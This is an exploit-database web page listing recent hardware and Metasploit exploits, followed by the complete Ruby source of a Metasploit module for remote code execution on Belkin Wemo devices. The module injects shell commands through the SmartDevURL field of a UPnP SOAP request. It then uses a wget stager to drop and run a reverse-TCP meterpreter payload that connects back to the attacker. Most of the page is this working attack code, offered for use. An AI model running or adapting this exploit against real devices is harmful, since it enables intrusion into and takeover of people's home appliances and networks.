Menu

Improved exploit search engine. Try python and hit enter

"Belkin Wemo UPnP - Remote Code Execution (Metasploit)"

Author

Metasploit

Platform

hardware

Release date

2019-02-20

Release Date Title Type Platform Author
2019-03-08 "Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)" local hardware Specter
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting" webapps hardware Tauco
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-28 "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow" dos hardware "Artem Metla"
2019-02-22 "Teracue ENC-400 - Command Injection / Missing Authentication" webapps hardware "Stephen Shkardoon"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting" webapps hardware "Bhushan B. Patil"
2019-01-28 "Cisco RV300 / RV320 - Information Disclosure" webapps hardware "Harom Ramos"
2019-01-28 "AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-25 "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection" webapps hardware "RedTeam Pentesting"
2019-01-24 "Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-28 "Sricam gSOAP 2.8 - Denial of Service" dos hardware "Andrew Watson"
2019-01-16 "Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset" webapps hardware "Adithyan AK"
2019-01-16 "GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal" webapps hardware "Pasquale Turi"
2019-01-16 "FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure" webapps hardware "Julio Ureña"
2019-01-14 "Lenovo R2105 - Cross-Site Request Forgery (Command Execution)" webapps hardware "Nathu Nandwani"
2019-01-14 "Across DR-810 ROM-0 - Backup File Disclosure" webapps hardware SajjadBnd
Release Date Title Type Platform Author
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2019-02-11 "Evince - CBT File Command Injection (Metasploit)" local linux Metasploit
2019-01-24 "AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-16 "blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-02 "Hashicorp Consul - Remote Command Execution via Services API (Metasploit)" remote linux Metasploit
2019-01-02 "Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)" remote linux Metasploit
2018-12-20 "Erlang - Port Mapper Daemon Cookie RCE (Metasploit)" remote multiple Metasploit
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-12-13 "CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)" local windows Metasploit
2018-12-04 "HP Intelligent Management - Java Deserialization RCE (Metasploit)" remote windows Metasploit
2018-12-04 "Emacs - movemail Privilege Escalation (Metasploit)" local unix Metasploit
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-29 "TeamCity Agent - XML-RPC Command Execution (Metasploit)" remote multiple Metasploit
2018-11-29 "PHP imap_open - Remote Code Execution (Metasploit)" remote linux Metasploit
2018-11-29 "Mac OS X - libxpc MITM Privilege Escalation (Metasploit)" local macos Metasploit
2018-11-29 "Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)" local linux Metasploit
2018-11-29 "Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit)" local linux Metasploit
2018-11-27 "Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)" remote hardware Metasploit
2018-11-26 "Xorg X11 Server - SUID privilege escalation (Metasploit)" local multiple Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-11-06 "Morris Worm - fingerd Stack Buffer Overflow (Metasploit)" remote bsd Metasploit
2018-11-06 "blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)" remote php Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46436/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
V##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'               => 'Belkin Wemo UPnP Remote Code Execution',
      'Description'        => %q{
        This module exploits a command injection in the Belkin Wemo UPnP API via
        the SmartDevURL argument to the SetSmartDevInfo action.

        This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
        devices are known to be affected, albeit on a different RPORT (49153).
      },
      'Author'             => [
        'phikshun', # Discovery, UFuzz, and modules
        'wvu'       # Crock-Pot testing and module
      ],
      'References'         => [
        ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
        ['URL', 'https://github.com/phikshun/ufuzz'],
        ['URL', 'https://gist.github.com/phikshun/10900566'],
        ['URL', 'https://gist.github.com/phikshun/9984624'],
        ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
        ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
        ['URL', 'http://www.wemo.com/']
      ],
      'DisclosureDate'     => '2014-04-04',
      'License'            => MSF_LICENSE,
      'Platform'           => ['unix', 'linux'],
      'Arch'               => [ARCH_CMD, ARCH_MIPSLE],
      'Privileged'         => true,
      'Targets'            => [
        ['Unix In-Memory',
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Type'           => :unix_memory,
          'DefaultOptions' => {
            'PAYLOAD'      => 'cmd/unix/generic'
          }
        ],
        ['Linux Dropper',
          'Platform'       => 'linux',
          'Arch'           => ARCH_MIPSLE,
          'Type'           => :linux_dropper,
          'DefaultOptions' => {
            'PAYLOAD'      => 'linux/mipsle/meterpreter_reverse_tcp'
          }
        ]
      ],
      'DefaultTarget'      => 1,
      'Notes'              => {
        'Stability'        => [CRASH_SAFE],
        'SideEffects'      => [ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(49152)
    ])

    register_advanced_options([
      OptBool.new('ForceExploit',  [true, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/setup.xml'
    )

    if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
      vprint_good('Wemo-enabled device detected')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    checkcode = check

    unless checkcode == CheckCode::Appears || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      cmdstager = generate_cmdstager(
        flavor:   'wget',
        temp:     datastore['WritableDir'],
        file:     File.basename(cmdstager_path),
        noconcat: true
      )

      # HACK: "chmod +x"
      cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
      cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
      cmdstager = cmdstager.join(';')

      vprint_status("Regenerated command stager: #{cmdstager}")
      execute_command(cmdstager)
    end
  end

  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method'       => 'POST',
      'uri'          => '/upnp/control/basicevent1',
      'ctype'        => 'text/xml',
      'headers'      => {
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
      },
      'data'         => generate_soap_xml(cmd)
    )
  end

  def generate_soap_xml(cmd)
    <<EOF
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
      <SmartDevURL>`#{cmd}`</SmartDevURL>
    </u:SetSmartDevInfo>
  </s:Body>
</s:Envelope>
EOF
  end

  def cmdstager_path
    @cmdstager_path ||=
      "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
  end

end